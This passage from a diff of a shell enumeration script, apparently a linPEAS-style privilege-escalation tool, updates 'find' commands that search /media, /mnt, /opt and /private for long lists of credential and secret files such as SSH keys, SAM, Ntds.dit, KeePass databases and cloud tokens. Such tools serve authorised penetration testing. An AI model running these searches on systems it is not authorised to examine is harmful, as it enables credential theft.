\".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find /private -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name 